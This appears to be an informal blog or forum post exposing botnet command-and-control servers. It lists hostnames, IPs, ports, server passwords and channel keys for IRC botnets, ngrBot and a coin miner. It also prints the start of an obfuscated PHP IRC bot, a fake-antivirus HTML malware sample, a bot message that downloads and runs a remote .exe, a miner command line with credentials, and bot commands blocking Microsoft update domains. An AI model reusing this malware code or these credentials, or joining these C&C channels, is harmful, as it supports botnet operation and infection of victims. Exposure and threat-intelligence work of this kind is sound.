Some of u heckers prob remember h1t3m, the Australian guy who got caught and sent to prison for infecting like 3k people. I found some nice logs, and as u can see it was not so hard to find him: he even told his real name to buyers who wanted to buy his spack have
xlaazer.no-ip.info(irc botnet hosted in United States Goose Creek Comcast Cable Communications Inc)
Resolved : [xlaazer.no-ip.info] To [76.23.217.80]
Remote Host Port Number
xlaazer.no-ip.info 8080 PASS none
Clients: I have 91 clients and 0 servers
Local users: Current Local Users: 91 Max: 1522
Global users: Current Global Users: 91 Max: 296
I don't have the exe file to find channels
hosting infos: http://whois.domaintools.com/76.23.217.80
b4nb1n0.dyndns.tv(ngrBot hosted in Spain Ovh Systems)
Domains used for controlling the botnet
b4nb1n0.dyndns.tv active d11.dyndns.tv 0csf15.dyndns.tv
Resolved : [b4nb1n0.dyndns.tv] To [178.33.116.27]
server: b4nb1n0.dyndns.tv PASS b4nb1
Local users: Current Local Users: 82 Max: 92
Global users: Current Global Users: 82 Max: 92
NICK n{USA|XPa}hrczwsa
USER hrczwsa 0 0 :hrczwsa
JOIN #hola juli26
Now talking in #hola
Modes On: [ #hola ] [
Fake Antivirus Example
The html file is encrypted; u have to decrypt the encrypted (base64) part. If u want to have more from this malware, open the html file in sandboxie to see what it does.
virtest.html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Wait a minute! This is important - we check your devices.</title>
<meta http-equiv="Content-Type" content="text/html;
91.121.171.64(irc botnet hosted in France Ovh Systems)
ip:port 91.121.171.64:9040
nick xUVEuwU
user cjfsiemx
channel #j
channel #c
channel #m
Now talking in #j
Topic On: [ #j ] [ =KN4iPk89Ohci3Sn1FY5LY8datYLj+i4PAPQuBzYYTyPX97LYmPrRD9RhXU0Gj5Kp5qfZU6LVVw90Ax ]
Topic By: [ y ]
Now talking in #c
Topic On: [ #c ] [ =qZw7/pkZ+h/Oi7VdGwYNa63Gdfp77grj2Awm4eqQ+xsz+tuggMYRZyQXWSVqN+7dBpeSdeEvC1MRGecRP2XBE8Vh/Xl ]
Topic By: [ y ]
UPDATE: 91.121.171.64:4676
Now talking in #balengor
Topic On: [
sssssss.devhoster.com(irc botnet hosted in China Beijing Chinanet Hunan Province Network)
Remote Host Port Number
sssssss.devhoster.com 6971 PASS laorosr
UPDATE:
Remote Host Port Number
sssssss.devhoster.com 4030 PASS eee
sssssss.devhoster.com 5060 PASS eee
NICK kmmmxji
USER ygrjllh "" "hkw" :ygrjllh
for more look here http://www.exposedbotnets.com/search?q=PASS+laorosr
hosting infos: http://whois.domaintools.com/175.6.1.159
gang.sexpil.net(Linux bots hosted in United States Truckee Softcom America Inc)
Another bot from Tijn
Resolved : [gang.sexpil.net] To [216.224.184.101]
<?php
@set_time_limit(0);
@error_reporting(0);
class HbZheTqekEkqwtqTQ {
  var $ttwtzTtWQWwhzbN = array(
    "BbWEWnHeTTwqnNhb"=>"gang.sexpil.net",
    "eBwz"=>"23232",
    "ZnQWe"=>"scary",
    "KqkktZ"=>"13",
    "KtWqnhZ"=>"#wWw#",
    "tZQ"=>"scan",
    "NneBweEZz"=>"41aa15390e2efa34ac693c3bd7cb8e88",
    "eWNTTTEhbQ"=>".",
    "BbzWWQkbNBb"=>"a87710e60dee7645081a8fc2fab74dbd");
  var $users = array();
  /* txZET4EZRnuKkWrlW8MjP0M46fREwjEPHtjqoOf51zFbmWn9VZiBQVvM0chmmL2T5c9jQffIFLK */
  function yySydpvYj($host) { $this->users[$host] = true; }
  function SjSpsYm($msg) { fwrite($this->rIiuOioIR,"$msg\r\n"); }
  function aGGAJSAgavgjADGa() {
    $chars = 'abcdefghijklmnopqrstuvwxyz_ABCDEFGHIJKLMNOPQRSTUVWXYZ-0123456789';
    $size = strlen($chars);
xxxd2.com(ngrBot hosted in United States Clarks Summit Volumedrive)
Resolved : [xxxd2.com] To [199.168.140.38]
Remote Host Port Number
173.192.224.115 80
199.15.234.7 80
199.168.140.38 7777 PASS Eshuxx
NICK n{US|XPa}evkfwgc
USER evkfwgc 0 0 :evkfwgc
JOIN #eshu Eshuxx
PRIVMSG #eshu :[d="http://www.fotosprivadas.com/chicas/update/Ruco.exe" s="172032 bytes"] Updated bot file "C:\Documents and Settings\UserName\Application Data\Scxaxs.exe" - Download retries: 0
Sample
hosting infos: http://whois.domaintools.com/199.168.140.38
new.pusikuracbre.me(CoinMiner hosted in Russian Federation Selectel Ltd.)
From same lamer here http://www.exposedbotnets.com/search?q=8332
Sample Sample Sample
Resolved : [new.pusikuracbre.me] To [31.186.102.181]
Resolved : [new.pusikuracbre.me] To [31.186.102.180]
Resolved : [new.pusikuracbre.me] To [31.186.102.155]
Running process
miner.exe -a 60 -g no -o http://new.pusikuracbre.me:8332/ -u d38a39ys_l3kpy -p el29djggss
Xandora results here
hosting infos: http://whois.domaintools.com/31.186.102.180
75.77.40.195(ngrBot hosted in United States Greenville Windstream Nuvox Inc)
Remote Host Port Number
199.15.234.7 80
75.77.40.195 6668 PASS ngrBot
PRIVMSG #asiksi# :[DNS]: Blocked "windowsupdate.microsoft.com"
NICK n{US|XPa}vxpwwmw
USER vxpwwmw 0 0 :vxpwwmw
JOIN #asiksi# asdr3ny
PRIVMSG #asiksi# :[DNS]: Blocked "www.microsoft.com"
PRIVMSG #asiksi# :[DNS]: Blocked "microsoft.com"
PRIVMSG #asiksi# :[DNS]: Blocked "update.microsoft.com"
Now talking in #asiksi#
Topic On: [ #asiksi# ] [ .mod usbi on .mdns www.microsoft.com